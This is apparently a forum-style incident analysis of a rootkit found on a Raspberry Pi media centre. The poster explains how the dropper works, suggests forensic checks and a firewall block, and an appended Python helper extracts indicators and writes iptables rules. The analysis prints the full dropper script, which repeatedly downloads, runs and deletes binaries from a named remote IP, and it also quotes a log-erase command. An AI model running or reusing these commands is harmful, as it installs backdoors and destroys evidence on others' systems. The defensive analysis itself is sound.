RPi 1 PRIVNUT1 process

Ok - from the file you sent me, the script actually tells us what this is about.
Root-kit installation script, which downloads and executes itself, then deletes the code to not leave traces on the filesystem.
It first changes into a directory, and will choose the first match, trying out /tmp, /var/run, /mnt, /root and finally /.
Once in there, it downloads a file with wget. As wget does not exist everywhere, it tries again with curl, hoping that one of the commands is successful.
Then it changes the mode of the file to be executable, executes it, then deletes itself.
What I didn’t find in the script is the log-erase function. Usually they have inside the script a
rm -f /var/log/system /var/log/messages /var/log/auth /var/log/secure …

And we see where he has all his files hosted. IP 185.73.147.5 (located in the Netherlands).

From the listing, it seems he tries to install a whole bunch of programs. Going from the names, we have here NTPD (timeserver), sshd/openssh (SSH server). These are probably modified to allow access to certain people/IPs/keys/hosts.

After that we have their own bash/sh, ftp and wget, apache, telnet, as a cron program. Probably all preconfigured in a way to implant itself onto the system, and once someone has detected parts and deleted them, it can restore its hack again through an alternate method.

I suspect privnut does something else altogether (DDoS, scans your media center for media and shares these, or worse, shares these through a torrent). We’d need to know exactly what it does, but I don’t have a free Pi here to test it out. I’d take a packet capture to analyze what happens with it. Or can one run the Pi/OSMC image inside a virtual machine?

Eventually you could check the /root/.bash_history, /.bash_history and /home/kodi/.bash_history files to see if he did something else, or if this was a completely automated script.
Also, issue the command: ~# last
This will show you who logged in and from where.

If there are no traces of a user login from an unknown IP address, and the .bash_history files do not show any activity, chances are that the hack occurred through a Kodi Add-On. We’ll have to find that Add-On in that case!

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privntpd1; curl -O http://185.73.147.5/privntpd1; chmod +x privntpd1; ./privntpd1; rm -rf privntpd1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privsshd1; curl -O http://185.73.147.5/privsshd1; chmod +x privsshd1; ./privsshd1; rm -rf privsshd1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privopenssh1; curl -O http://185.73.147.5/privopenssh1; chmod +x privopenssh1; ./privopenssh1; rm -rf privopenssh1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privbash1; curl -O http://185.73.147.5/privbash1; chmod +x privbash1; ./privbash1; rm -rf privbash1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privtftp1; curl -O http://185.73.147.5/privtftp1; chmod +x privtftp1; ./privtftp1; rm -rf privtftp1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privwget1; curl -O http://185.73.147.5/privwget1; chmod +x privwget1; ./privwget1; rm -rf privwget1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privcron1; curl -O http://185.73.147.5/privcron1; chmod +x privcron1; ./privcron1; rm -rf privcron1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privftp1; curl -O http://185.73.147.5/privftp1; chmod +x privftp1; ./privftp1; rm -rf privftp1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privpftp1; curl -O http://185.73.147.5/privpftp1; chmod +x privpftp1; ./privpftp1; rm -rf privpftp1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privsh1; curl -O http://185.73.147.5/privsh1; chmod +x privsh1; ./privsh1; rm -rf privsh1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privnut1; curl -O http://185.73.147.5/privnut1; chmod +x privnut1; ./privnut1; rm -rf privnut1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privapache21; curl -O http://185.73.147.5/privapache21; chmod +x privapache21; ./privapache21; rm -rf privapache21
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privtelnetd1; curl -O http://185.73.147.5/privtelnetd1; chmod +x privtelnetd1; ./privtelnetd1; rm -rf privtelnetd1

What you can do in the short term to prevent this from happening is add a filter to block 185.73.147.5 on your firewall/router in both directions. This will prevent the user from downloading its files. But that is only valid until he identifies it and changes the remote server. If this is implanted through a Kodi Add-On, this would actually prevent this tool from spreading in your LAN.

UPDATE: There is one thing I want you, and all the others, to be aware of.
The reason one secures his systems is not to stop hackers from going into it and getting a copy of your pr0n collection, or your contacts, or your media. The reason I secure my systems is to prevent these script kiddies from participating in new hacks using “my” system as the source. Imagine a remote surgical operation takes place, and the DDoS cuts connectivity to the control robot: the patient dies.
That is the reason to secure your systems…! If you don’t do that, you are liable for whatever is done through your device.
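As an added example (not part of the post above, and not the poster's own tooling), here is a small Python helper for the defender side of what the post describes: it reads a dropper script in the download / chmod +x / execute / rm -rf shape quoted above, pulls out the hosting IP(s) and payload names, flags any log-erase line of the kind the poster looked for, and turns the hosts into the both-directions firewall block the post recommends. The sample script text is constructed from the first and the privnut1 lines of the quoted script; the iptables rules assume a Linux host or router where iptables is in use.

```python
import re
from typing import List, NamedTuple

# Constructed sample: two lines in the same one-liner shape as the dropper quoted
# in the post (same host and payload names as the post, trimmed to two stages).
SAMPLE_DROPPER = """#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privntpd1; curl -O http://185.73.147.5/privntpd1; chmod +x privntpd1; ./privntpd1; rm -rf privntpd1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.73.147.5/privnut1; curl -O http://185.73.147.5/privnut1; chmod +x privnut1; ./privnut1; rm -rf privnut1
"""

# http(s)://host[:port]/payload  -> (host, payload)
URL_RE = re.compile(r"https?://([\w.\-]+)(?::\d+)?/([^\s;\"']+)")
# One-line stage: download, chmod +x NAME, ./NAME, rm -rf NAME (same NAME each time)
STAGE_RE = re.compile(r"(wget|curl)\b.*chmod \+x ([^\s;]+).*\./\2\b.*rm -rf \2")
# The log-erase pattern the poster looked for (rm -f / rm -rf on /var/log/...)
LOGWIPE_RE = re.compile(r"rm -r?f\b")
LOGPATH_RE = re.compile(r"/var/log/\S*")


class DropperReport(NamedTuple):
    hosts: List[str]       # hosting servers to block
    payloads: List[str]    # file names fetched and executed
    stage_lines: int       # lines matching download/chmod/exec/delete
    wiped_logs: List[str]  # /var/log paths the script tries to erase


def analyse_dropper(text: str) -> DropperReport:
    """Extract indicators from a dropper script; order of first appearance is kept."""
    hosts: List[str] = []
    payloads: List[str] = []
    wiped: List[str] = []
    stages = 0
    for line in text.splitlines():
        for host, path in URL_RE.findall(line):
            if host not in hosts:
                hosts.append(host)
            if path not in payloads:
                payloads.append(path)
        if STAGE_RE.search(line):
            stages += 1
        if LOGWIPE_RE.search(line):
            wiped.extend(LOGPATH_RE.findall(line))
    return DropperReport(hosts, payloads, stages, wiped)


def block_rules(hosts: List[str]) -> List[str]:
    """iptables rules dropping traffic to and from each host, both directions."""
    rules: List[str] = []
    for h in hosts:
        rules.append(f"iptables -I INPUT -s {h} -j DROP")
        rules.append(f"iptables -I OUTPUT -d {h} -j DROP")
    return rules


if __name__ == "__main__":
    report = analyse_dropper(SAMPLE_DROPPER)
    print(report)
    print("\n".join(block_rules(report.hosts)))
```

On a router that forwards for the LAN, the equivalent rules go on the FORWARD chain; the INPUT/OUTPUT pair above is for the Pi itself.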